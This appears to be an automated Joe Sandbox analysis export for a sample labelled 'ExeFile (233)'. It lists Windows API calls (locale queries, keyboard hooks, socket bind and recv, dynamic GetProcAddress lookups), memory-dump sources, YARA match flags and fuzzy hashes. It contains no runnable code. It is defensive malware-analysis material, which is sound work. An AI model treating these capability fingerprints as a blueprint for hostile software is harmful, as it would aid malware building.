                                                                  • Instruction Fuzzy Hash: 1BF0AF72D401249BCB209BF5ED8C49BB7F8FB183947860571DC11E7120D6349A518BD8
                                                                  APIs
                                                                  • lstrcpyA.KERNEL32(00000800,LOC), ref: 00427F84
                                                                  • LoadLibraryA.KERNEL32(?), ref: 00427FB7
                                                                  • GetLocaleInfoA.KERNEL32(00000800,00000003,00000800,00000004), ref: 00427FC7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: InfoLibraryLoadLocalelstrcpy
                                                                  • String ID: LOC
                                                                  • API String ID: 864663389-519433814
                                                                  • Opcode ID: 9b864cf7d00240f33efc80dbe4055dc1b43c4b1b79d0572f7f5122539e718ff0
                                                                  • Instruction ID: 80581f1108e614f4ea904bb7e7a22fcd021204f87db94054b61d7c27fe4284fc
                                                                  • Opcode Fuzzy Hash: 9b864cf7d00240f33efc80dbe4055dc1b43c4b1b79d0572f7f5122539e718ff0
                                                                  • Instruction Fuzzy Hash: 9601F730B0C118EBDB14DB61ED45ADB376CEB00320F418562FA16E2190E738CA058BA9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                  • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: "-$t<C7$t<C7$z}$Ei
                                                                  • API String ID: 0-1832362217
                                                                  • Opcode ID: e8d2fd9cd58a50925f43cca816ba68788b8f5ccbc1fbda49f8565b75a662cb90
                                                                  • Instruction ID: fdc78890633e496698b9ee955be1916b84a4ea558c7e5472ebecea036c82a0e4
                                                                  • Opcode Fuzzy Hash: e8d2fd9cd58a50925f43cca816ba68788b8f5ccbc1fbda49f8565b75a662cb90
                                                                  • Instruction Fuzzy Hash: A081AF72A153029FD314EFE4A84CA3BB7E6EB84608F40495DF45697258EBB0DD48CBD2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113709625.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21c0000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: "-$t<C7$t<C7$z}$Ei
                                                                  • API String ID: 0-1832362217
                                                                  • Opcode ID: e9951e02e279bf2fb8e96ac9af4ea0a0f1a4852d9572745ba4539eff4543d218
                                                                  • Instruction ID: cfb165a633ad725c63a47fd265266aeb1970fcc57638785fb2b1eae3753fcfdf
                                                                  • Opcode Fuzzy Hash: e9951e02e279bf2fb8e96ac9af4ea0a0f1a4852d9572745ba4539eff4543d218
                                                                  • Instruction Fuzzy Hash: BA812375A083019FC324EFA9D98462FB7E6ABD4304F64492DF066E7294E770D908CBC2
                                                                  APIs
                                                                    • Part of subcall function 00423CEB: GetWindowLongA.USER32(?,000000F0), ref: 00423CF6
                                                                  • GetKeyState.USER32(00000010), ref: 00422199
                                                                  • GetKeyState.USER32(00000011), ref: 004221A2
                                                                  • GetKeyState.USER32(00000012), ref: 004221AB
                                                                  • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 004221C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: State$LongMessageSendWindow
                                                                  • String ID:
                                                                  • API String ID: 1063413437-0
                                                                  • Opcode ID: aed42ab7bb75c1cd56564738b3e39d445ed7b92ea90c531288bc4bc1f9d8c3dd
                                                                  • Instruction ID: 81c6e2ddc2ea8cfb9092195715bcc3f3fea8f194ae87aed2471ca2276cf2a0cc
                                                                  • Opcode Fuzzy Hash: aed42ab7bb75c1cd56564738b3e39d445ed7b92ea90c531288bc4bc1f9d8c3dd
                                                                  • Instruction Fuzzy Hash: E2F0E93A34036B35D92436777D01FB610144F41BD8FC1053AB702FA1E2C9D98C125239
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                  • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: W$$ke@5$ke@5$l!`u
                                                                  • API String ID: 0-26469448
                                                                  • Opcode ID: 61b3e33a99d05dc8f4f4ee720d28fb33bd23e0cc6f898fd2b8d6158320bc4e19
                                                                  • Instruction ID: e2772d0aaba3dc3fae28a03d6167796c310e26a00c697fe4e6f5df22c63317c9
                                                                  • Opcode Fuzzy Hash: 61b3e33a99d05dc8f4f4ee720d28fb33bd23e0cc6f898fd2b8d6158320bc4e19
                                                                  • Instruction Fuzzy Hash: 3622C4736353028BC724EEE8954C23E76EAAB80644F54491EE585D7258EB78CDC8CBD3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113709625.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21c0000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: W$$ke@5$ke@5$l!`u
                                                                  • API String ID: 0-26469448
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ]C$0$]C$0$tm6$tm6
                                                                  • API String ID: 0-1577568632
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: _strlen$EnumLocalesSystem
                                                                  • String ID:
                                                                  • API String ID: 2581538701-0
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32 ref: 00403116
                                                                  • GetLocaleInfoA.KERNEL32(00000000,00001004,00000007,00000007), ref: 00403129
                                                                  • GetACP.KERNEL32 ref: 00403155
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Locale$InfoThread
                                                                  • String ID:
                                                                  • API String ID: 4232894706-0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID: 4
                                                                  • API String ID: 3519838083-4088798008
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6g4$6g4$Ei
                                                                  • API String ID: 0-2833161213
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale_strncpy
                                                                  • String ID:
                                                                  • API String ID: 4025304676-0
                                                                  APIs
                                                                    • Part of subcall function 0040E573: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040E58D
                                                                    • Part of subcall function 0040E573: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0040E59E
                                                                    • Part of subcall function 0040E573: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 0040E5E4
                                                                  • GetLocaleInfoW.KERNEL32(00000001,?,?,00000000,?,?,00000001), ref: 0041B4DC
                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,?,?,00000000,00000000,?,00000000,?,?,00000001), ref: 0041B4FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: InfoQueryVirtual$ByteCharLocaleMultiSystemWide
                                                                  • String ID:
                                                                  • API String ID: 2568233206-0
                                                                  APIs
                                                                    • Part of subcall function 0040E573: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040E58D
                                                                    • Part of subcall function 0040E573: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0040E59E
                                                                    • Part of subcall function 0040E573: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 0040E5E4
                                                                  • GetLocaleInfoA.KERNEL32(00000001,?,?,?,?,?,00000001), ref: 0041B3B2
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,000000FF,?,?,?,?,?,?,00000001), ref: 0041B3D2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: InfoQueryVirtual$ByteCharLocaleMultiSystemWide
                                                                  • String ID:
                                                                  • API String ID: 2568233206-0
                                                                  APIs
                                                                  • _strlen.LIBCMT ref: 00418CAF
                                                                  • EnumSystemLocalesA.KERNEL32(00418B21,00000001,?,0043C8F0,00415C9D,?,0043F8E8,?), ref: 00418CE7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: EnumLocalesSystem_strlen
                                                                  • String ID:
                                                                  • API String ID: 216762292-0
                                                                  APIs
                                                                  • GetVersionExA.KERNEL32 ref: 00403192
                                                                  • InterlockedExchange.KERNEL32(0043B13C,Function_00003110), ref: 004031B6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ExchangeInterlockedVersion
                                                                  • String ID:
                                                                  • API String ID: 2700998522-0
                                                                  APIs
                                                                  • _strlen.LIBCMT ref: 00418BF2
                                                                  • EnumSystemLocalesA.KERNEL32(00418802,00000001,?,0043C8F0,00415C9D,?,0043F8E8,?), ref: 00418C0C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: EnumLocalesSystem_strlen
                                                                  • String ID:
                                                                  • API String ID: 216762292-0
                                                                  Strings
                                                                  • String ID: UI$dD
                                                                  Strings
                                                                  • String ID: UI$dD
                                                                  Strings
                                                                  • String ID: UI$dD
                                                                  Strings
                                                                  • String ID: UI$dD
                                                                  Strings
                                                                  • String ID: UI$UI
                                                                  Strings
                                                                  • String ID: UI$UI
                                                                  APIs
                                                                  • API ID: H_prolog
                                                                  APIs
                                                                  • GetLocaleInfoA.KERNEL32(?,00001004,00000100,00000006,00000100,?,00000000), ref: 0041771A
                                                                  • API ID: InfoLocale
                                                                  APIs
                                                                  • bind.WS2_32(?,00000002,00000002), ref: 00404237
                                                                  • API ID: bind
                                                                  APIs
                                                                  • API ID: recv
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_000120FC), ref: 0041214F
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00412163
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  Strings
                                                                  • String ID: J
                                                                  Strings
                                                                  • String ID: ,
                                                                  Strings
                                                                  • String ID: ,
                                                                  • API String ID: 0-48859977
                                                                  • Opcode ID: f7fa7f053b15b3b9bc5260059ed6039f3f15b89ed0c9b9de4249ee0e0695fea7
                                                                  • Instruction ID: d42f9b19fcb6303a803e1255991ebc5012a589cb5b545adcc1df40b218eacb7b
                                                                  • Opcode Fuzzy Hash: f7fa7f053b15b3b9bc5260059ed6039f3f15b89ed0c9b9de4249ee0e0695fea7
                                                                  • Instruction Fuzzy Hash: 5E418B74A093029FC758EFA9D85412AB7E2BFD0314F00C92DE4D697260EB78D9098F82
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113709625.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21c0000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4003efdb1b82660489297cf81d9eb3b1a92828f19abc9c79053ce197bdd8e6b4
                                                                  • Instruction ID: 95098c659b7b316fb844f3011324dda32821350ec32ec3ff75f46a658c7ca03a
                                                                  • Opcode Fuzzy Hash: 4003efdb1b82660489297cf81d9eb3b1a92828f19abc9c79053ce197bdd8e6b4
                                                                  • Instruction Fuzzy Hash: 2FF1F5B8A41209EFDB04CF94C990BAEB7B5BF5C304F208598E916AB345D775EA41CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113709625.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21c0000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                                                  • Instruction ID: 9802b7dcc1a5b64f98980c37fdcbdc93eb48ff07e91f4580621f6d11f12c18d0
                                                                  • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                                                                  • Instruction Fuzzy Hash: A5318F7AA4474ACFC710DF18C48092BB7E4FF99318F1609ADE99587312D734E946CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7cd0e825c18cab67390afa4095cd2c0ef4cc4a4a1ddd955d0601115f156ff26c
                                                                  • Instruction ID: ab5976e4691acd30db67047bee70cfeddbfbf72eaf8120044587c8c4a2e010f3
                                                                  • Opcode Fuzzy Hash: 7cd0e825c18cab67390afa4095cd2c0ef4cc4a4a1ddd955d0601115f156ff26c
                                                                  • Instruction Fuzzy Hash: DF21B8729002049BCB10EF6AC8C0967BBA5FF84350B4689ADDD559B286E734F925C7E0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                   • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmp
                                                                   • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                  • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                  • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                  • Instruction Fuzzy Hash:
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113709625.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21c0000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                  • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                  • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                  • Instruction Fuzzy Hash:
                                                                  APIs
                                                                  • RegisterWindowMessageA.USER32(Native), ref: 0042A314
                                                                  • RegisterWindowMessageA.USER32(OwnerLink), ref: 0042A31D
                                                                  • RegisterWindowMessageA.USER32(ObjectLink), ref: 0042A327
                                                                  • RegisterWindowMessageA.USER32(Embedded Object), ref: 0042A331
                                                                  • RegisterWindowMessageA.USER32(Embed Source), ref: 0042A33B
                                                                  • RegisterWindowMessageA.USER32(Link Source), ref: 0042A345
                                                                  • RegisterWindowMessageA.USER32(Object Descriptor), ref: 0042A34F
                                                                  • RegisterWindowMessageA.USER32(Link Source Descriptor), ref: 0042A359
                                                                  • RegisterWindowMessageA.USER32(FileName), ref: 0042A363
                                                                  • RegisterWindowMessageA.USER32(FileNameW), ref: 0042A36D
                                                                  • RegisterWindowMessageA.USER32(Rich Text Format), ref: 0042A377
                                                                  • RegisterWindowMessageA.USER32(RichEdit Text and Objects), ref: 0042A381
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: MessageRegisterWindow
                                                                  • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                  • API String ID: 1814269913-2889995556
                                                                  • Opcode ID: b09424a890d9c2d964cd6ab38d7185a386422683ead705cd42c27e26f868f6a1
                                                                  • Instruction ID: fc5418e7bedd38ffc0e11e4f4bc2214e5acc9818e2d4631a821a168c411807f2
                                                                  • Opcode Fuzzy Hash: b09424a890d9c2d964cd6ab38d7185a386422683ead705cd42c27e26f868f6a1
                                                                  • Instruction Fuzzy Hash: 8E018C70A407845ACB30BFB69C09D4BBEE0EEC9B107615E6FE495A7660D6BCD001CF48
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00428019
                                                                  • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00428024
                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 00428055
                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 0042805D
                                                                  • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0042806A
                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 00428084
                                                                  • ConvertDefaultLocale.KERNEL32(000003FF), ref: 0042808A
                                                                  • GetVersion.KERNEL32 ref: 00428098
                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 004280BD
                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 004280E3
                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 0042812F
                                                                  • ConvertDefaultLocale.KERNEL32(76230A60), ref: 00428135
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00428140
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ConvertDefaultLocale$AddressProc$CloseHandleModuleOpenQueryValueVersion
                                                                  • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                  • API String ID: 780041395-483790700
                                                                  • Opcode ID: 978b5882cf4835e7424ef31a4d6838547d496389b0aa7b075c70622b72c37f28
                                                                  • Instruction ID: 2dc31b13f6de58c0e78e48cd1bee0818dccec789095d0f28fd6a06ab5592f720
                                                                  • Opcode Fuzzy Hash: 978b5882cf4835e7424ef31a4d6838547d496389b0aa7b075c70622b72c37f28
                                                                  • Instruction Fuzzy Hash: A5514B71F40229AFDF109FE6DC85ABEBAB8EB48354F54043BF501E3290DA7C59419B68
                                                                  APIs
                                                                    • Part of subcall function 00429CA6: __EH_prolog.LIBCMT ref: 00429CAB
                                                                  • CallNextHookEx.USER32(?,00000003,?,?), ref: 00422E85
                                                                  • GetClassLongA.USER32(?,000000E6), ref: 00422ECA
                                                                  • GlobalGetAtomNameA.KERNEL32(?,?,00000005), ref: 00422EF6
                                                                  • lstrcmpiA.KERNEL32(?,ime), ref: 00422F05
                                                                  • SetWindowLongA.USER32(?,000000FC,Function_0002242E), ref: 00422F3F
                                                                  • CallNextHookEx.USER32(?,00000003,?,?), ref: 00423043
                                                                  • UnhookWindowsHookEx.USER32(?), ref: 00423054
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Hook$CallLongNext$AtomClassGlobalH_prologNameUnhookWindowWindowslstrcmpi
                                                                  • String ID: #32768$AfxOldWndProc423$ime
                                                                  • API String ID: 3204395069-4034971020
                                                                  • Opcode ID: 2e54a2d68c0ca1e145083fe81b64065eb11ebc909a731c844331e9d10c2e6431
                                                                  • Instruction ID: a72a045e4e3713aab608079d00397e783e2f759094d70b61f3d5639fb80dd1df
                                                                  • Opcode Fuzzy Hash: 2e54a2d68c0ca1e145083fe81b64065eb11ebc909a731c844331e9d10c2e6431
                                                                  • Instruction Fuzzy Hash: 6951C331700124BBDF219F61ED48B9E7BB4AF18361F908166F814A62A1C778DE45DBAC
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(USER32,?,?,?,00405143), ref: 0040501B
                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00405037
                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00405048
                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00405059
                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 0040506A
